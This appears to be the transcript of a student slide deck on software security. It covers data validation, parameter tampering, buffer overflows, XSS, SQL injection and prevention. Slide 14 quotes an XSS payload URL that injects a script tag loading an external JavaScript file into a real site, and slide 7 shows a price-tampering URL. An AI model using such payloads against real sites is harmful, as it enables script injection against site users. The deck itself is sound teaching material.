Software Security - PowerPoint PPT Presentation

1 / 20
About This Presentation
Title:

Software Security

Description:

Omissions. Errors, poor quality assurance. Etc. Data Validation. Process of ensuring that a program operates on clean, correct and useful data ... – PowerPoint PPT presentation

Number of Views:43
Avg rating:3.0/5.0
Slides: 21
Provided by: compu62
Category:

less

Transcript and Presenter's Notes

Title: Software Security


1
Software Security
  • Ben Hubbard
  • Jason Fletcher
  • Szabolcs Palinko
  • Amit Tambe
  • Ryan Smith
  • Keith Gargano

2
Overview
  • Discussion
  • Data Validation
  • General Errors
  • Input Sanitation
  • Parameter Manipulation
  • Code Injection
  • Bounds and Type Checking
  • Specific Exploits
  • Buffer Overflows
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Prevention
  • Demonstrations
  • Conclusion

3
Discussion
  • What causes exploits?
  • Failure to meet requirements
  • Omissions
  • Errors, poor quality assurance
  • Etc.

4
Data Validation
  • Process of ensuring that a program operates on
    clean, correct and useful data
  • Most vulnerabilities are a result of poor data
    validation techniques

5
Data Validation Errors
  • Input Sanitation
  • Bounds and Type Checking

6
Input Sanitation
  • Failure to filter user input
  • Leads to Parameter Manipulation and Code Injection

7
Parameter Manipulation
  • Ability for input from a form to be changed
  • Example
  • http//www.example.corsaire.com/buySpatula.jsp?mod
    elNumber234
  • http//www.example.corsaire.com/buySpatula.jsp?mod
    elNumber234price0.1

8
Code Injection
  • Subverting input so that data is interpreted as
    commands
  • Basis of SQL injection and Cross-site Scripting

9
Bounds and Type Checking
  • Insuring that any value safely handles input
    outside of expected values
  • Expecting positive integers from 1 to 10, getting
    -1
  • Expecting an integer, getting a decimal number

10
Vulnerability Examples
  • Buffer Overflow
  • Cross-site Scripting (XSS)
  • SQL Injection

11
Buffer Overflows
  • Injecting more data than a particular abstract
    container can hold, and then that data spilling
    over into places it should not be in order to
    cause changes to the system
  • Example of Bounds Checking

12
Buffer Overflows
  • OS Specific
  • Famous example strcpy
  • Copies data from a source string to a destination
    string without verifying the size of the
    destination string is large enough to hold the
    data
  • Replaced with strncpy
  • Strcpy still supported for legacy code
    compatibility

13
Cross-site Scripting (XSS)
  • Dynamic web pages can be produced based on user
    input
  • Users can input scripts into input sources, thus
    allowing malicious code to be run on a trusted
    site
  • Example of Code Injection

14
Cross-site Scripting (XSS)
  • http//www.bbc.co.uk/bbcone/listings/index.shtml?s
    ervice_id4223DAYtoday20223E3Cscript20srch
    ttp//www.securitylab.ru/test/sc.js3E3C/script3
    E3C!--

15
Cross-site Scripting (XSS)
16
SQL Injection
  • Inserting SQL statements into user input to have
    those commands executed by the database
  • Example of Code Injection
  • Integration between database and OS allows
    execution of OS commands

17
Prevention
  • Reject bad data, accept only known good data
  • Regular expressions
  • Test all bounds
  • Black box testing
  • Thorough Quality Assurance

18
Prevention
  • Buffer Overflows Use methods that inspect input
    size, manually inspect each input for
    correctness, random addressing
  • XSS Disable scripting languages, filter
    characters
  • SQL Injection Sanitize user input, use bound
    parameters prepared statements

19
Demonstrations
  • IE Buffer Overflow Jamikazu Attack
  • Firefox Buffer Overflow
  • Metasploit Framework

20
Conclusion
  • www.milw0rm.com
  • www.metasploit.org
Write a Comment
User Comments (0)
About PowerShow.com